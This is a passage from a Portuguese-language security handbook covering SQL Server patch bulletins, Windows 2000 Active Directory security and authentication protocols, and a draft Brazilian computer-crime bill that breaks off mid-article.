Pack 1.

Junho de 2001

MS01-032: SQL Query Method Enables Cached Administrator


Connection to be Reused
(http://www.microsoft.com/technet/security/bulletin/MS01-032.asp)
(site em inglês)

Este problema foi corrigido primeiro no SQL Server 2000 Service


Pack 1.
Terrorismo Tecnológico 384
Aprenda Para Sobreviver

Dezembro de 2000

MS00-092: Extended Stored Procedure Parameter Parsing


Vulnerability
(http://www.microsoft.com/technet/security/bulletin/MS00-092.asp)
(site em inglês)

Este problema foi corrigido primeiro no SQL Server 2000 Service


Pack 1.

SQL Server 7.0

Abril de 2002

MS02-020: SQL Extended Procedure Functions Contain


Unchecked Buffers (Q319507)
(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS02-020.asp) (site em inglês)

Este problema foi corrigido primeiro no Microsoft SQL Server 7.0


Service Pack 4.

Fevereiro de 2002

MS02-007: SQL Server Remote Data Source Function Contain


Unchecked Buffers
(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS02-007.asp) (site em inglês)
Terrorismo Tecnológico 385
Aprenda Para Sobreviver

Este problema foi corrigido primeiro no Microsoft SQL Server 7.0


Service Pack 4.

Dezembro de 2001

MS01-060: SQL Server Text Formatting Functions Contain


Unchecked Buffers
(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS01-060.asp) (site em inglês)

Este problema foi corrigido primeiro no Microsoft SQL Server 7.0


Service Pack 4.

Junho de 2001

MS01-032: SQL Query Method Enables Cached Administrator


Connection to be Reused
(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS01-032.asp) (site em inglês)

Este problema foi corrigido primeiro no Microsoft SQL Server 7.0


Service Pack 4.

Atualize as ferramentas antivírus e os arquivos de assinatura de


vírus. Verifique os alertas de vírus
(http://www.microsoft.com/technet/security/virus/virus.asp) (site em
inglês) regularmente.
Terrorismo Tecnológico 386
Aprenda Para Sobreviver

Manutenção de segurança contínua

Sem a manutenção contínua, o seu sistema pode se tornar


vulnerável a novas formas de ataques. Siga regularmente estas
etapas recomendadas:

• Use a ferramenta Hfnetchk


(http://www.microsoft.com/technet/security/tools/tools/hfnetchk
.asp) para avaliar as correções de segurança que foram
aplicadas ao sistema operacional Windows 2000, assim como
as correções de segurança para o Internet Information
Services 5.0, o SQL Server 7.0, o SQL Server 2000 (incluindo
o Microsoft Data Engine [MSDE]) e o Internet Explorer 5.01 ou
superior. É recomendável executar as etapas necessárias
para assegurar que todos os patches de segurança críticos
sejam instalados.
• Inscreva-se no Microsoft Security Notification Service
(http://www.microsoft.com/technet/security/bulletin/notify.asp)
(site em inglês). Esse é um serviço gratuito de notificação por
email que a Microsoft utiliza para enviar informações aos
assinantes sobre a segurança dos produtos da Microsoft.
• Use o site Windows Update
(http://windowsupdate.microsoft.com/) (site em inglês) para
Terrorismo Tecnológico 387
Aprenda Para Sobreviver

verificar as atualizações recomendáveis e críticas mais


recentes.
• É importante aplicar as novas correções de segurança
disponibilizadas. A Microsoft criou a ferramenta Qchain
(http://www.microsoft.com/downloads/release.asp?ReleaseID
=29821) (site em inglês) para reunir os hotfixes, de forma que
somente uma reinicialização seja necessária durante a
instalação de várias correções.

Para obter mais informações

Veja a seguir informações adicionais sobre como manter seus


servidores SQL Server protegidos:

20.11 Segurança do SQL Server 2000

SQL Server Security on TechNet


(http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/
default.asp) (site em inglês)

SQL Server 2000 Operations Guide Chapter 3 - Security


Administration
(http://www.microsoft.com/technet/prodtechnol/sql/maintain/operate/
opsguide/sqlops3.asp) (site em inglês)
Terrorismo Tecnológico 388
Aprenda Para Sobreviver

SQL Server 2000 C2 Administrator's and User's Security Guide


(http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/
sqlc2.asp) (site em inglês)

SQL Server 2000 Security White Paper


(http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/
sql2ksec.asp) (site em inglês)

SQL Server 2000 Resource Kit Chapter 10 - Implementing


Security
(http://www.microsoft.com/technet/prodtechnol/sql/reskit/sql2000/par
t3/c1061.asp) (site em inglês)

Microsoft SQL Server 2000 Security


(http://www.microsoft.com/technet/prodtechnol/sql/deploy/confeat/05
ppcsqa.asp) no capítulo 5 de SQL Server 2000 Administrator's
Pocket Consultant
(http://www1.fatbrain.com/asp/bookinfo/bookinfo.asp?theisbn=07356
11297&p=technet&s=29736) (sites em inglês) de William R. Stanek

SQL Server 7.0 Administrator's Companion Chapter 7 - Managing


Security
(http://www.microsoft.com/technet/prodtechnol/sql/proddocs/adminc
mp/75517c07.asp) (site em inglês)
Terrorismo Tecnológico 389
Aprenda Para Sobreviver

SQL Server 7.0 Resource Guide Chapter 16 - Product Security


(http://www.microsoft.com/technet/prodtechnol/sql/reskit/sql7res/part
10/sqc15.asp) (site em inglês)

SQL Server 7.0 Security White Paper


(http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/
secure.asp) (site em inglês)

INF: List of Bugs Fixed by SQL Server 7.0 Service Packs


(http://support.microsoft.com/view/tn.asp?kb=313980) (site em
inglês)

20.12 Segurança em servidores com o Win 2000 Server

Tivemos a pouco tempo o lançamento do Windows 2003 Server


mas as mudanças não são tantas e muitos dos recurso de
segurança em um S.O. se repete no outro com pouquíssimas
mudanças.

• No Active Directory pode ser feita toda a política de segurança


de domínio e conta. O Active Directory, que proporciona
replicação e disponibilidade de informação de conta para
múltiplos Controladores de Domínio, está disponível para
administração remota, suportando um espaço de nome
hierárquico para informação de conta de usuário, grupo e de
computador.

Active Directory e Segurança


Terrorismo Tecnológico 390
Aprenda Para Sobreviver

Parte deste documento a seguir foi retirado o próprio Site da


Microsoft mostrando os recursos de segurança do Active Directory
no final do texto há informações para uma pesquisa mais avançada.

Informação de conta no Windows NT é mantida atualmente com o


uso de uma porção segura do registry nos controladores de domínio.
Usando trust de domínio e autenticação pass-through, uma
hierarquia de dois níveis de domínios proporciona alguma
flexibilidade par a a organização do gerenciamento de contas e
recursos de servidor; entretanto, as contas são mantidas em um
espaço de nome flat sem nenhuma organização interna.
Serviços de Segurança Distribuída Windows 2000 usam o Active
Directory como o repositório para informação de conta. O Active
Directory proporciona melhoria significativa na implementação
baseada em registry, nas áreas de performance e escalabilidade, e
oferece um ambiente administrativo com ricas funcionalidades.
O diagrama seguinte mostra a estrutura hierárquica para uma árvore
de domínios Windows 2000, e o contexto de nomes hierárquicos em
cada domínio usando unidades organizacionais (OUs) como
recipientes de objetos de diretório.
Terrorismo Tecnológico 391
Aprenda Para Sobreviver

Domain Hierarchy: Domain Tree


¾ Organizational Unit (OU) hierarchy
within a Domain
¾ Users, Groups, Machines,
Printers, etc.

OU

OU

Users

Figura 1. Estrutura hierárquica do Active Directory

Vantagens do Gerenciamento de Conta do Active Directory


As vantagens da integração do gerenciamento de conta de
segurança com o Active Directory são:
• Contas para usuários, grupos e máquinas podem ser
organizadas em recipientes de diretório chamados unidades
organizacionais (OUs). Um domínio pode ter qualquer número de
OUs organizadas em um espaço de nome estruturado em
árvores. Empresas podem organizar o espaço de nome para
informação de conta para representar os departamentos e
organizações na empresa. Contas de usuário, assim como OUs,
são objetos de diretório que podem ser renomeados facilmente
na árvore de domínio com as mudanças na organização.
• O Active Directory suporta um número muito maior de objetos de
usuário (mais de 1 milhão de objetos) com melhor performance
que o registry. O tamanho do domínio individual não está mais
limitado a performance do repositório de conta de segurança.
Uma árvore de domínios conectados pode suportar estruturas
organizacionais bem maiores e complexas.
• Administração da informação de conta é melhorada com o uso
Terrorismo Tecnológico 392
Aprenda Para Sobreviver

de ferramentas gráficas avançadas para gerenciamento do


Active Directory, assim como através de suporte OLE DS para
linguagens de script. Podem ser implementadas tarefas comuns
com o uso de batch scripts para automatizar a administração.
• Serviços de replicação de diretório suportam múltiplas cópias de
informação de conta, sendo que podem ser feitas atualizações
em qualquer cópia, não somente no controlador de domínio
primário designado. O suporte a Lightweight Directory Access
Protocol (LDAP) e sincronização de diretório proporcionam os
mecanismos para ligar o diretório Windows com outros diretórios
da empresa.
Armazenar informação de conta de segurança no Active Directory
significa que os usuários e grupos são representados como objetos
no diretório. Acesso de leitura e escrita aos objetos no diretório pode
ser dado ao objeto como um todo, ou para propriedades individuais
do objeto. Administradores possuem controle refinado sobre quem
pode atualizar informação de usuário e de grupo. Por exemplo, um
grupo de operadores de Telecom pode receber o acesso de escrita
somente para propriedades de conta de usuário relacionadas a
equipamento telefônico do escritório, sem a necessidade de
receberem privilégios completos de Conta Operador ou
Administrador.
O conceito de um grupo também é simplificado porque grupos locais
e globais são representados por objetos de grupo no diretório.
Interfaces de programação existentes para acesso a grupo local
ainda são suportadas para compatibilidade completa com o
passado. Entretanto, grupos definidos no diretório podem ser
usados para controle de acesso em todo o domínio, a recursos ou
somente para propósitos de administração local no controlador de
domínio.

Relacionamento entre Diretório e Serviços de Segurança


Existe uma relação fundamental entre o Active Directory e os
Serviços de segurança integrados no sistema operacional
Windows 2000. O Active Directory armazena informação de política
de segurança de domínio—tais como restrições de senha a todo o
domínio e privilégios de acesso ao sistema—que possuem influência
direta no uso do sistema. Objetos relacionados a segurança no
diretório devem ser administrados de maneira segura para evitar
Terrorismo Tecnológico 393
Aprenda Para Sobreviver

alterações não autorizadas que afetam a segurança geral do


sistema. O sistema operacional Windows 2000 implementa modelo
de segurança baseado em objeto e controle de acesso para todos
os objetos no Active Directory. Todo objeto no Active Directory
possui um descritor de segurança único que define permissões de
acesso necessárias para ler ou atualizar as propriedades do objeto.
O diagrama abaixo mostra o relacionamento fundamental entre o
Active Directory e os serviços de segurança do sistema operacional.

Directory and Security Services

‹ Active Directory Active Directory


¾ Stores security policy
and account
information
‹ Operating system
¾ Implements security
model on all objects
¾ Trusts information
stored securely in the
directory Windows 2000 Server

Figura 2. Relacionamento entre o Active Directory e os serviços de


Segurança

O Active Directory usa imitação e verificação de acesso


Windows 2000 para determinar se um cliente Active Directory pode
ler ou atualizar o objeto desejado. Isto significa que o cliente LDAP
pede ao diretório que acione o sistema operacional para reforçar
controle de acesso, ao invés do próprio Active Directory ter que
tomar decisões de controle de acesso.
O modelo de segurança do Windows 2000 proporciona uma
implementação unificada e consistente de controle de acesso a
todos os recursos de domínio, baseado na participação em grupo.
Terrorismo Tecnológico 394
Aprenda Para Sobreviver

Componentes de segurança do Windows 2000 podem confirmar a


informação relacionada a segurança armazenada no diretório. Por
exemplo, o serviço de autenticação do Windows 2000 armazena
informação de senha encriptada em uma porção segura do diretório
de objetos de usuário. O sistema operacional confirma que esta
informação de política de segurança está armazenada de maneira
segura e que as restrições de conta ou participação em grupo não
são alteradas por ninguém sem acesso autorizado. Em adição,
informação de política de segurança para gerenciamento geral de
domínio é mantida no diretório.
Esta relação fundamental da Segurança e o Active Directory é
atingida somente através da completa integração do diretório com o
sistema operacional Windows 2000, e não está disponível de outra
forma.

Relações de Confiança de Domínio


Domínios do Windows 2000 podem ser organizados em uma árvore
hierárquica de domínio. As relações de confiança entre domínios
permitem que usuários sem contas definidas no domínio, sejam
autenticados por servidores de recursos em outro domínio. No
Windows NT 4.0 e em versões anteriores, relações de confiança
interdomínios são definidas por contas de domínio relações de
confiança em uma viaentre controladores de domínio. O
gerenciamento de relações de confiança entre domínios de contas e
domínios de recursos em uma rede grande é uma tarefa complexa.
O Active Directory suporta duas formas de relações de confiança:
• Relações de confiança em uma via explícitas a domínios
Windows NT 4.0.
• Relações de confiança em duas vias transitivas entre domínios
que são parte da árvore de domínio do Windows 2000.
O diagrama abaixo mostra os dois estilos de relação de confiança.
Terrorismo Tecnológico 395
Aprenda Para Sobreviver

Domain Trust Relationships


Microsoft.Com

Downlevel
Domain Domain

FarEast. Microsoft. Com Europe. Microsoft. Com

Explicit NT4-style Trusts

Domain Domain

Kerberos Trust
Domain

Domain

Figura 3. Relações de confiançade domínios

Confianças transitivas entre domínios simplifica o gerenciamento de


contas confiávis interdomínios. Domínios que são membros da
árvore de domínio definem uma relação de confiança em duas vias
com o domínio pai na árvore. Todos os domínios implicitamente
confirmam outros domínios na árvore. Se existem domínios
específicos que não querem relação de confiança em duas vias,
contas de relações de confiança em uma via explícitas podem ser
definidas. Para organizações com múltiplos domínios, o número
geral de relações de confiança em uma via explícitos é reduzido de
maneira significativa.

Delegação de Administração
Delegação de administração é uma ferramenta de valor para as
organizações confinarem a administração de segurança para
aplicação somente em subconjuntos definidos do domínio inteiro da
organização. O requisito importante é conceder direitos para
administrar um pequeno conjunto de usuários ou grupos nas suas
áreas de responsabilidade e, ao mesmo tempo, não dar permissões
para contas de gerenciamento em outras partes da organização.
Delegação de responsabilidade para criar usuários ou grupos é
Terrorismo Tecnológico 396
Aprenda Para Sobreviver

definida no nível da unidade organizacional (OU), ou container, onde


as contas são criadas. Administradores de grupo para uma unidade
organizacional não possuem necessariamente a habilidade de criar
e gerenciar contas para outra unidade organizacional em um
domínio. Entretanto, configurações de política para todo o domínio e
direitos de acesso definidos em níveis superiores na árvores de
diretório podem ser aplicados usando herança de direitos de acesso.
Há três maneiras de definir a delegação de responsabilidades de
administração:
• Delegar permissões para alterar propriedades em um recipente
particular, tal como o LocalDomainPolicies do próprio objeto de
domínio.
• Delegar permissões para criar e deletar objetos filho de um tipo
específico embaixo de uma OU, tal como Usuários, Grupos ou
Impressoras.
• Delegar permissões para atualizar propriedades específicas em
objetos filho de um tipo específicos embaixo de uma OU; por
exemplo o direito de configurar senhas em objetos Usuário.
A interface de usuário do Directory Service Administration facilita a
visualização de informação delegada definida para recipientes.
Também é fácil adicionar novas delegações de permissões, através
da seleção de para quem você deseja delegar permissão, e a
escolha de quais permissões eles precisam.
A integração do repositório de contas de segurança com o Active
Directory proporciona benefícios reais para administrar uma
empresa. Performance, facilidade de administração e escalabilidade
para grandes organizações são o resultado direto. Empresas
baseadas na Internet podem usar árvores de domínio e OUs
hierárquicas para organizar contas para parceiros de negócio,
clientes assíduos ou fornecedores com direitos de acesso
específicos aos seus sistemas.

Direitos de Acesso Refinado


Grandes organizações dependem tipicamente de muitos indivíduos
ou grupos para garantir e gerenciar a infraestrutura de conta de
rede. Eles precisam da habilidade de conceder direitos de acesso a
operações específicas—tais como limpar senhas de usuário ou
desabilitar contas—para grupos específicos sem conceder
Terrorismo Tecnológico 397
Aprenda Para Sobreviver

permissão de criar novas contas ou alterar outras propriedades de


contas de usuário.
A arquitetura de segurança para objetos do Active Directory usa
descritores de segurança do Windows 2000 para controlar o acesso
a objetos. Cada objeto no diretório possui um descritor de segurança
único. A Lista de Controle de Acesso (ACL) no descritor de
segurança é uma lista de entradas que concedem ou negam direitos
de acesso específico a usuários ou grupos. Direitos de acesso
podem ser concedidos ou negados com níveis de escopo diferentes
no objeto. Direitos de acesso podem ser definidos em qualquer um
dos seguintes níveis:
• Aplicar ao objeto como um todo, que significa a aplicação a todas
as propriedades do objeto.
• Aplicar a um grupo de propriedades definidas por conjuntos de
propriedade no objeto.
• Aplicar a uma propriedade individual do objeto.
Conceder acesso uniforme de leitura/escrita a todas as propriedades
de um objeto é a permissão de acesso padrão para o criador do
objeto. Conceder ou negar permissões de acesso a objeto a um
conjunto de propriedades, é uma maneira conveniente de definir
permissões a um grupo de propriedades relacionadas. O
agrupamento de propriedades é definido pelo atributo de conjunto
de propriedades de uma propriedades no esquema. A relação do
conjunto de propriedades pode ser customizada através da
alteração do esquema. Finalmente, a definição de direitos de acesso
em um nível por propriedade proporciona o mais alto nível de
granularidade de permissões. Definição de acesso por propriedade
está disponível em todos os objetos no Active Directory.
Objetos de recipente no diretório também suportam acesso refinado
com respeito a quem possui permissões para criar objetos filho e
quais tipos de objeto filho eles podem criar. Por exemplo, o controle
de acesso definido em uma unidade organizacional (OU) pode
definir quem pode criar objetos Usuário (contas) neste container.
Outra entrada no controle de acesso para a OU pode definir quem
pode criar objetos Impressora. Controle de acesso refinado nos
recipientes do diretório é uma maneira efetiva de manter a
organização do espaço de nomes do diretório.
Uma nova implementação do Editor de Lista de Controle de Acesso
Terrorismo Tecnológico 398
Aprenda Para Sobreviver

(ACL), o controle de diálogo comum para visualização ou alteração


de permissões de segurança de objeto, proporciona uma interface
fácil de usar para a definição de direitos de acesso para objetos do
Active Directory, através de conjunto de propriedades ou
propriedades individuais. O Editor ACL também suporta a definição
de direitos de acesso herdados em objetos de container que são
válidos para todos os sub-objetos naquela porção da árvore de
diretório.

Herança de Direitos de Acesso


Herança de direitos de acesso refere-se a como a informação de
controle de acesso definida em recipientes de mais alto nível do
diretório, se espalha para subrecipientes e objetos folha. Geralmente
há dois modelos para a implementação de herança de direitos de
acesso: herança dinâmica e estática. Herança dinâmica determina
os direitos de acesso efetivos a um objeto através da avaliação das
permissões definidas explicitamente no objeto e das permissões
definidas para todos os objetos pai no diretório. Isto permite
flexibilidade para alterar o controle de acesso em porções da árvore
de diretório através de alterações específicas no container que
afetam automaticamente todos os subrecipientes e objetos folha. O
custo desta flexibilidade é o custo de performance para avaliar
direitos de acesso efetivos na hora que um cliente requisita uma
operação de leitura/escrita em um objeto de diretório específico.
Windows 2000 implementa uma forma estática de herança de
direitos de acesso, referenciada como herança Create Time. Pode
ser definida a informação de controle de acesso que se espalha
para objetos filho do container. Quando o objeto filho é criado, os
direitos de herança do recipente são misturados aos direitos de
acesso padrão no novo objeto. Quaisquer mudanças nos direitos de
acesso herdados em níveis superiores da árvore devem ser
propagadas para todos os objetos filho afetados. Novos direitos de
acesso herdados são propagados pelo Active Directory para os
objetos aos quais eles se aplicam, baseado em opções para como
os novos direitos são definidos.
Performance para verificação de controle de acesso é bem rápida
com o uso do modelo estático de herança de direitos de acesso. O
sistema operacional é projetado para otimizar verificações de
acesso, operações necessárias e freqüentes, não somente para o
Terrorismo Tecnológico 399
Aprenda Para Sobreviver

objeto de diretório, mas também para os arquivos de sistema e


todos os outros objetos de sistema do Windows 2000.

Windows 2000 suporta múltiplos protocolos de segurança de rede


porque cada protocolo proporciona compatibilidade para clientes
existentes, mecanismos de segurança mais efetivos ou
funcionalidades de interoperabilidade para redes heterogêneas
como a Internet. Há muitos protocolos de autenticação nas redes
corporativas atualmente, e a arquitetura Windows 2000 não limita
quais protocolos podem ser suportados. Um protocolo de segurança
que atenda todas as necessidades deveria ser mais simples, mas as
configurações de redes, de pequenas empresas a provedores de
conteúdo Internet de larga escala, não compartilham os mesmos
requisitos de segurança. Os clientes precisam poder escolher como
integrar nova tecnologia de segurança, tal como senhas dinâmicas
ou criptografia de chave pública, nos seus ambientes
computacionais.
Windows 2000 é projetado para suportar múltiplos protocolos de
segurança, um elemento essencial para o ambiente computacional
distribuído de hoje. Usando APIs de segurança Win32® de
propósito geral, o sistema operacional isola as aplicações
suportadas dos detalhes dos diferentes protocolos de segurança
disponíveis. Interfaces de aplicação de mais alto nível proporcionada
por RPC e DCOM Autenticados proporciona abstrações baseadas
em parâmetros de interface para usar serviços de segurança.
A infraestrutura de segurança do Windows 2000 suporta estes
protocolos primários de segurança:
• O protocolo de autenticação do Windows NT LAN Manager
(NTLM) é usado pelo Windows NT 4.0 e versões anteriores do
Windows NT. NTLM continuará a ser suportado e usado para
autenticação de rede pass-through, acesso de arquivo remoto e
conexões RPC autenticadas a versões anteriores do
Windows NT.
• O protocolo de autenticação Kerberos Versão 5 substitui o NTLM
como o protocolo de segurança primário para acesso a recursos
nos domínios Windows 2000. O protocolo de autenticação
Kerberos é um padrão de indústria maduro que possui vantagens
Terrorismo Tecnológico 400
Aprenda Para Sobreviver

para autenticação de rede Windows. Alguns dos benefícios do


protocolo Kerberos são autenticação mútua do cliente e servidor,
carga de servidor reduzida durante o estabelecimento de
conexão, e suporte a delegação de autorização de clientes para
servidores através do uso de mecanismos proxy.
• Distributed Password Authentication (DPA) é o protocolo de
autenticação secreto compartilhado usado por algumas das
maiores organizações da Internet, tais como a MSN e
CompuServe. Este protocolo de autenticação faz parte dos
serviços Microsoft Commercial Internet System (MCIS) e é
projetado especificamente para usuários utilizarem a mesma
senha Internet para conectar a qualquer número de sites Internet
que são parte da mesma organização. Os servidores de
conteúdo da Internet usam o serviço de autenticação MCIS como
um serviço Internet de retaguarda, e os usuários podem
conectar-se a múltiplos sites sem ter que redigitar suas senhas.
• Protocolos baseados em chave pública proporcionam
privacidade e confiabilidade sobre a Internet. SSL é o padrão de
fato atualmente para conexões entre browsers Internet e
servidores de informação Internet. (Uma definição de protocolo
padrão IETF baseada em SSL3 é conhecida correntemente por
Transport Layer Security Protocol, ou TLS). Estes protocolos,
que usam certificados de chave pública para autenticar clientes e
servidores, dependem de uma infraestrutura de chave pública
para amplo uso. Windows NT 4.0 proporciona serviços de
segurança de canal seguro que implementam os protocolos
SSL/PCT. Segurança no Windows 2000 possui suporte
melhorado a protocolos de chave pública, o que está descrito a
seguir neste documento.
Terrorismo Tecnológico 401
Aprenda Para Sobreviver

Segurança corporativa depende da flexibilidade de usar os


mecanismos de segurança certos quando necessário. Computação
corporativa continuará a depender de uma ampla faixa de serviços
de rede proporcionados por servidores remotos de arquivo e
impressão, servidores de aplicações de negócio e dados, e data
warehouse e ambientes de processamento transacionais. Suporte a
múltiplos protocolos de segurança de rede permite que o
Windows 2000 Professional e o Windows 2000 Server hospedem
uma variedade de serviços de rede em adição as tecnologias
baseadas na Internet.
O diagrama seguinte mostra o suporte de arquitetura para múltiplos
protocolos de segurança implementados no Windows 2000 usando

Architecture For Multiple


Authentication Services
Internet Explorer, Directory Mail,
Remote DCOM Internet Information enabled apps Chat,
file application Server using ADSI News

CIFS/SMB Secure RPC HTTP LDAP POP3, NNTP

SSPI
NTLM Kerberos SChannel DPA
SSL/TLS

MSV1_0/ KDC/ Membership


SAM Directory services

a Security Support Provider Interface (SSPI).

Figura 4. Arquitetura para Múltiplos Serviços de Autenticação

O Security Support Provider Interface é uma API Win32 de sistema


usada por muitas aplicações e serviços de sistema—tais como o
Terrorismo Tecnológico 402
Aprenda Para Sobreviver

Internet Explorer (IE) e Internet Information Server (IIS)—para isolar


protocolos de nível aplicação de protocolos de segurança usados
para autenticação de rede. Provedores de segurança usam
credenciais diferentes para autenticar o usuário, ou certificados
secretos compartilhados ou de chave pública. Os protocolos de
segurança interagem com diferentes serviços de autenticação e
armazéns de informação de conta.
• O provedor de segurança NTLM usa o serviço de autenticação
MSV1_0 e o serviço NetLogon em um controlador de domínio,
para autenticação cliente e informação de autorização.
• O provedor de segurança Kerberos conecta a um Key
Distribution Center (KDC) online e ao armazém de conta Active
Directory para tickets de sessão.
• DPA usa os serviços de segurança MCIS para autenticação
membership e informação de acesso específica de servidor.
• Serviços de canal seguro são baseados em certificados de chave
pública emitidos por Autoridades Certificadoras trusted; eles não
exigem um servidor de autenticação online.

O S.O. Server possui varias vantagens pois pode trabalhar com


protocolos múltiplos, e com chaves de critografia avançadas,
autentificador kerberus, entre outras tecnologias que ajudam a
proteger a segurança do Sistema. Mas como vimos isso só não
basta há de se pensar em todas as possibilidades possíveis de
ataques sendo nos cabso no servidor, nos micros dos usuários...

Para informação mais recente sobre Windows 2000 e Windows NT


Server, visite o Web site http://www.microsoft.com/ntserver e o
Windows NT Server Fórum na Microsoft Network (GO WORD:
MSNTS).
Para mais informação sobre o Windows 2000 Active Directory, veja
o white paper, Microsoft Windows NT Active Directory Technical
Terrorismo Tecnológico 403
Aprenda Para Sobreviver

Summary.
Informação adicional sobre segurança Microsoft Internet está
disponível no Web site http://www.microsoft.com/security.
Informação adicional sobre a arquitetura de segurança Windows NT,
Security Support Provider Interface, CryptoAPI e APIs de segurança
do Windows NT está disponível nas referências online para a
Plataforma SDK Microsoft.

As partes retiradas do site da Microsoft tiveram a Revisão Técnica


por Giuliano Pasquale – Seminar Group Microsoft Brasil
Terrorismo Tecnológico 404
Aprenda Para Sobreviver

CAPÍTULO XXI

LEIS – ESSAS QUE DEVERIAM VALER


Terrorismo Tecnológico 405
Aprenda Para Sobreviver

Projeto de Lei 1.713 - Substitutivo - versão final - Dez


Dispõe sobre os crimes de informática e dá outras providências
O Congresso Nacional decreta:

22.1 DOS PRINCÍPIOS QUE REGULAM A


PRESTAÇÃO DE
SERVIÇO POR REDES DE COMPUTADORES

Art. 1º. O acesso, o processamento e a disseminação de informações através


das redes de computadores devem estar a serviço do cidadão e da
sociedade, respeitados os critérios de garantia dos direitos individuais e
coletivos e de privacidade e segurança de pessoas físicas e jurídicas e da
garantia de acesso às informações disseminadas pelos serviços da rede.

Art. 2º. É livre a estruturação e o funcionamento das redes de computadores


e seus serviços, ressalvadas as
disposições específicas reguladas em lei.

22.2 DO USO DE INFORMAÇÕES DISPONÍVEIS EM


COMPUTADORES OU REDES DE COMPUTADORES

Art. 3º. Para fins desta lei, entende-se por informações privadas aquelas
relativas a pessoa física ou jurídica identificada ou identificável.

Parágrafo Único: É identificável a pessoa cuja individuação não envolva


custos ou prazos desproporcionados.

Art. 4º. Ninguém será obrigado a fornecer informações sobre sua pessoa ou
de terceiros, salvo nos casos previstos em lei.

Art. 5º. A coleta, o processamento e a distribuição, com finalidades


comerciais, de informações privadas ficam sujeitas à prévia aquiescência da
Terrorismo Tecnológico 406
Aprenda Para Sobreviver

pessoa a que se referem, que poderá ser tornada sem efeito a qualquer
momento, ressalvando-se o pagamento de indenizações a terceiros, quando
couberem.

§ 1º. A toda pessoa cadastrada dar-se-á conhecimento das informações


privadas armazenadas e das respectivas fontes.

§ 2º. Fica assegurado o direito à retificação de qualquer informação privada


incorreta.

§ 3º. Salvo por disposição legal ou determinação judicial em contrário,


nenhuma informação privada será mantida à revelia da pessoa a que se
refere ou além do tempo previsto para a sua validade.

§ 4º. Qualquer pessoa, física ou jurídica, tem o direito de interpelar o


proprietário de rede de computadores ou provedor de serviço para saber se
mantém informações a seu respeito, e o respectivo teor.

Art. 6º. Os serviços de informações ou de acesso a bancos de dados não


distribuirão informações privadas referentes, direta ou indiretamente, a
origem racial, opinião política, filosófica, religiosa ou de orientação sexual,
e de filiação a qualquer entidade, pública ou privada, salvo autorização
expressa do interessado.

Art. 7º. O acesso de terceiros, não autorizados pelos respectivos


interessados, a informações privadas mantidas em redes de computadores
dependerá de prévia autorização judicial.

22.3 DOS CRIMES DE INFORMÁTICA

Dano a dado ou programa de computador

Art. 8º. Apagar, destruir, modificar ou de qualquer forma inutilizar, total ou


parcialmente, dado ou programa de computador, de forma indevida ou não
autorizada.
Pena: detenção, de um a três anos e multa.
Terrorismo Tecnológico 407
Aprenda Para Sobreviver

Parágrafo único. Se o crime é cometido:


I - contra o interesse da União, Estado, Distrito Federal, Município, órgão
ou entidade da administração direta ou indireta ou de empresa
concessionária de serviços públicos;

II - com considerável prejuízo para a vítima;

III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de


terceiro;

IV - com abuso de confiança;

V - por motivo fútil;

VI - com o uso indevido de senha ou processo de identificação de terceiro;


ou

VII - com a utilização de qualquer outro meio fraudulento.


Pena: detenção, de dois a quatro anos e multa

Acesso indevido ou não autorizado


Art. 9o. Obter acesso, indevido ou não autorizado, a computador ou rede de
computadores.

Pena: detenção, de seis meses a um ano e multa.

Parágrafo primeiro. Na mesma pena incorre quem, sem autorização ou


indevidamente, obtém, mantém ou fornece a terceiro qualquer meio de
identificação ou acesso a computador ou rede de computadores.

Parágrafo segundo. Se o crime é cometido:

I - com acesso a computador ou rede de computadores da União, Estado,


Distrito Federal, Município, órgão ou entidade da administração direta ou
indireta ou de empresa concessionária de serviços públicos;

II - com considerável prejuízo para a vítima;


Terrorismo Tecnológico 408
Aprenda Para Sobreviver

III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de


terceiro;

IV - com abuso de confiança;

V - por motivo fútil;

VI - com o uso indevido de senha ou processo de identificação de terceiro;


ou

VII - com a utilização de qualquer outro meio fraudulento.

Pena: detenção, de um a dois anos e multa.

Alteração de senha ou mecanismo de acesso a programa de computador ou


dados

Art. 10o. Apagar, destruir, alterar, ou de qualquer forma inutilizar, senha ou


qualquer outro mecanismo de acesso a computador, programa de
computador ou dados, de forma indevida ou não autorizada.

Pena: detenção, de um a dois anos e multa.

Obtenção indevida ou não autorizada de dado ou instrução de computador

Art. 11o. Obter, manter ou fornecer, sem autorização ou indevidamente,


dado ou instrução de computador.

Pena: detenção, de três meses a um ano e multa.

Parágrafo único. Se o crime é cometido:

I - com acesso a computador ou rede de computadores da União, Estado,


Distrito Federal, Município, órgão ou entidade da administração direta ou
indireta ou de empresa concessionária de serviços públicos;
Terrorismo Tecnológico 409
Aprenda Para Sobreviver

II - com considerável prejuízo para a vítima;

III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de


terceiro;

IV - com abuso de confiança;

V - por motivo fútil;

VI - com o uso indevido de senha ou processo de identificação de terceiro;


ou

VII - com a utilização de qualquer outro meio fraudulento.

Pena: detenção, de um a dois anos e multa

Violação de segredo armazenado em computador, meio magnético de


natureza magnética, optica ou similar

Art. 12o. Obter segredos, de indústria ou comércio, ou informações


pessoais armazenadas em computador, rede de computadores, meio
eletrônico de natureza magnética, óptica ou similar, de forma indevida ou
não autorizada.

Pena: detenção, de um a três anos e multa.

Criação, desenvolvimento ou inserção em computador de dados ou


programa de computador com fins nocivos

Art. 13o. Criar, desenvolver ou inserir, dado ou programa em computador


ou rede de computadores, de forma indevida ou não autorizada, com a
finalidade de apagar, destruir, inutilizar ou modificar dado ou programa de
computador ou de qualquer forma dificultar ou impossibilitar, total ou
parcialmente, a utilização de computador ou rede de computadores.

Pena: reclusão, de um a quatro anos e multa.


Terrorismo Tecnológico 410
Aprenda Para Sobreviver

Parágrafo único. Se o crime é cometido:

I - contra a interesse da União, Estado, Distrito Federal. Município, órgão


ou entidade da administração direta ou indireta ou de empresa
concessionária de serviços públicos;

II - com considerável prejuízo para a vítima;

III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de


terceiro;

IV - com abuso de confiança;

